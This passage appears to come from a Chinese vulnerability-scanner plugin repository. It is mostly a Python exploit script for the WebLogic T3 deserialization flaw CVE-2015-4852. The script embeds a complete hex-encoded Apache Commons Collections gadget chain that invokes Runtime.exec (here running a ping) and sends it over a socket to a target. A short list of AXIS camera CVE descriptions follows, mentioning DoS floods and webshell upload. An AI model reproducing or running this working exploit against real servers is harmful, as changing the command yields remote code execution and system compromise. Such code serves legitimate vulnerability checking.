29 | chunk2 = "\xac\xed\x00\x05\x73\x72\x00\x32\x73\x75\x6e\x2e\x72\x65\x66\x6c\x65\x63\x74\x2e\x61\x6e\x6e\x6f\x74\x61\x74\x69\x6f\x6e\x2e\x41\x6e\x6e\x6f\x74\x61\x74\x69\x6f\x6e\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x55\xca\xf5\x0f\x15\xcb\x7e\xa5\x02\x00\x02\x4c\x00\x0c\x6d\x65\x6d\x62\x65\x72\x56\x61\x6c\x75\x65\x73\x74\x00\x0f\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x4d\x61\x70\x3b\x4c\x00\x04\x74\x79\x70\x65\x74\x00\x11\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x3b\x78\x70\x73\x7d\x00\x00\x00\x01\x00\x0d\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x4d\x61\x70\x78\x72\x00\x17\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x72\x65\x66\x6c\x65\x63\x74\x2e\x50\x72\x6f\x78\x79\xe1\x27\xda\x20\xcc\x10\x43\xcb\x02\x00\x01\x4c\x00\x01\x68\x74\x00\x25\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x72\x65\x66\x6c\x65\x63\x74\x2f\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x3b\x78\x70\x73\x71\x00\x7e\x00\x00\x73\x72\x00\x2a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x6d\x61\x70\x2e\x4c\x61\x7a\x79\x4d\x61\x70\x6e\xe5\x94\x82\x9e\x79\x10\x94\x03\x00\x01\x4c\x00\x07\x66\x61\x63\x74\x6f\x72\x79\x74\x00\x2c\x4c\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x63\x6f\x6d\x6d\x6f\x6e\x73\x2f\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2f\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\x78\x70\x73\x72\x00\x3a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x43\x68\x61\x69\x6e\x65\x64\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x30\xc7\x97\xec\x28\x7a\x97\x04\x02\x00\x01\x5b\x00\x0d\x69\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x73\x74\x00\x2d\x5b\x4c\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x63\x6f\x6d\x6d\x6f\x6e\x73\x2f\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2f\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\x78\
x70\x75\x72\x00\x2d\x5b\x4c\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\xbd\x56\x2a\xf1\xd8\x34\x18\x99\x02\x00\x00\x78\x70\x00\x00\x00\x05\x73\x72\x00\x3b\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x43\x6f\x6e\x73\x74\x61\x6e\x74\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x58\x76\x90\x11\x41\x02\xb1\x94\x02\x00\x01\x4c\x00\x09\x69\x43\x6f\x6e\x73\x74\x61\x6e\x74\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x78\x70\x76\x72\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x52\x75\x6e\x74\x69\x6d\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x73\x72\x00\x3a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x49\x6e\x76\x6f\x6b\x65\x72\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x87\xe8\xff\x6b\x7b\x7c\xce\x38\x02\x00\x03\x5b\x00\x05\x69\x41\x72\x67\x73\x74\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x4c\x00\x0b\x69\x4d\x65\x74\x68\x6f\x64\x4e\x61\x6d\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x0b\x69\x50\x61\x72\x61\x6d\x54\x79\x70\x65\x73\x74\x00\x12\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x3b\x78\x70\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x3b\x90\xce\x58\x9f\x10\x73\x29\x6c\x02\x00\x00\x78\x70\x00\x00\x00\x02\x74\x00\x0a\x67\x65\x74\x52\x75\x6e\x74\x69\x6d\x65\x75\x72\x00\x12\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x43\x6c\x61\x73\x73\x3b\xab\x16\xd7\xae\xcb\xcd\x5a\x99\x02\x00\x00\x78\x70\x00\x00\x00\x00\x74\x00\x09\x67\x65\x74\x4d\x65\x74\x68\x6f\x64\x75\x71\x00\x7e\x00\x1e\x00\x00\x00\x02\x76\
x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\xa0\xf0\xa4\x38\x7a\x3b\xb3\x42\x02\x00\x00\x78\x70\x76\x71\x00\x7e\x00\x1e\x73\x71\x00\x7e\x00\x16\x75\x71\x00\x7e\x00\x1b\x00\x00\x00\x02\x70\x75\x71\x00\x7e\x00\x1b\x00\x00\x00\x00\x74\x00\x06\x69\x6e\x76\x6f\x6b\x65\x75\x71\x00\x7e\x00\x1e\x00\x00\x00\x02\x76\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x76\x71\x00\x7e\x00\x1b\x73\x71\x00\x7e\x00\x16\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x3b\xad\xd2\x56\xe7\xe9\x1d\x7b\x47\x02\x00\x00\x78\x70\x00\x00\x00\x01\x74\x00\x19\x70\x69\x6e\x67\x20\x2d\x63\x20\x34\x20\x31\x39\x32\x2e\x31\x36\x38\x2e\x32\x35\x33\x2e\x31\x33\x30\x74\x00\x04\x65\x78\x65\x63\x75\x71\x00\x7e\x00\x1e\x00\x00\x00\x01\x71\x00\x7e\x00\x23\x73\x71\x00\x7e\x00\x11\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x49\x6e\x74\x65\x67\x65\x72\x12\xe2\xa0\xa4\xf7\x81\x87\x38\x02\x00\x01\x49\x00\x05\x76\x61\x6c\x75\x65\x78\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4e\x75\x6d\x62\x65\x72\x86\xac\x95\x1d\x0b\x94\xe0\x8b\x02\x00\x00\x78\x70\x00\x00\x00\x01\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x48\x61\x73\x68\x4d\x61\x70\x05\x07\xda\xc1\xc3\x16\x60\xd1\x03\x00\x02\x46\x00\x0a\x6c\x6f\x61\x64\x46\x61\x63\x74\x6f\x72\x49\x00\x09\x74\x68\x72\x65\x73\x68\x6f\x6c\x64\x78\x70\x3f\x40\x00\x00\x00\x00\x00\x00\x77\x08\x00\x00\x00\x10\x00\x00\x00\x00\x78\x78\x76\x72\x00\x12\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x76\x65\x72\x72\x69\x64\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x71\x00\x7e\x00\x3a"
30 |
31 | chunk3 = '\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x21\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x65\x65\x72\x49\x6e\x66\x6f\x58\x54\x74\xf3\x9b\xc9\x08\xf1\x02\x00\x07\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x74\x00\x27\x5b\x4c\x77\x65\x62\x6c\x6f\x67\x69\x63\x2f\x63\x6f\x6d\x6d\x6f\x6e\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\x3b\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x56\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x97\x22\x45\x51\x64\x52\x46\x3e\x02\x00\x03\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x71\x00\x7e\x00\x03\x4c\x00\x0e\x72\x65\x6c\x65\x61\x73\x65\x56\x65\x72\x73\x69\x6f\x6e\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x12\x76\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x41\x73\x42\x79\x74\x65\x73\x74\x00\x02\x5b\x42\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\
x69\x74\x6c\x65\x71\x00\x7e\x00\x05\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x05\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x05\x78\x70\x77\x02\x00\x00\x78\xfe\x00\xff\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x46\x21\x00\x00\x00\x00\x00\x00\x00\x00\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\x00\x0b\x75\x73\x2d\x6c\x2d\x62\x72\x65\x65\x6e\x73\xa5\x3c\xaf\xf1\x00\x00\x00\x07\x00\x00\x1b\x59\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x78\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x1d\x01\x81\x40\x12\x81\x34\xbf\x42\x76\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\xa5\x3c\xaf\xf1\x00\x00\x00\x00\x00\x78'
32 |
33 | totallength = len(chunk1) + len(chunk2) + len(chunk3)
34 |
35 | len_hex = hex(totallength)
36 |
37 | len_hex = len_hex.replace('0x', '0')
38 |
39 | s1 = len_hex[:2]
40 | s2 = len_hex[2:4]
41 | len_hex = unhexlify(s1 + s2)
42 |
43 | chunk1 = '\x00\x00' + len_hex + '\x01\x65\x01\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x71\x00\x00\xea\x60\x00\x00\x00\x18\x43\x2e\xc6\xa2\xa6\x39\x85\xb5\xaf\x7d\x63\xe6\x43\x83\xf4\x2a\x6d\x92\xc9\xe9\xaf\x0f\x94\x72\x02\x79\x73\x72\x00\x78\x72\x01\x78\x72\x02\x78\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x70\x70\x70\x70\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x06\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x03\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x03\x78\x70\x77\x02\x00\x00\x78\xfe\x01\x00\x00'
44 |
45 | payload = chunk1 + chunk2 + chunk3
46 |
47 | payload = "{0}{1}".format(struct.pack('!i', len(payload)), payload[4:])
48 |
49 | sock.send(payload)
50 | response = sock.recv(15000)
51 | print(("[*]测试返回内容为{}".format(response)))
52 | except Exception as e:
53 | print("CVE_2015_4852脚本出错")
if __name__ == '__main__':
    # Manual self-test against the local default T3 port.
    target_host, target_port = '127.0.0.1', 7001
    run(target_host, target_port)
--------------------------------------------------------------------------------
/plugins/CVE的原理分析网址处理脚本/temp.txt:
--------------------------------------------------------------------------------
1 | CVE-2018-9158 An issue was discovered on AXIS M1033-W (IP camera) Firmware version 5.40.5.1 devices. They don't employ a suitable mechanism to prevent a DoS attack, which leads to a response time delay. An attacker can use the hping3 tool to perform an IPv4 flood attack, and the services are interrupted from attack start to end.
2 | CVE-2018-9157 ** DISPUTED ** An issue was discovered on AXIS M1033-W (IP camera) Firmware version 5.40.5.1 devices. The upload web page doesn't verify the file type, and an attacker can upload a webshell by making a fileUpload.shtml request for a custom .shtml file, which is interpreted by the Apache HTTP Server mod_include module with "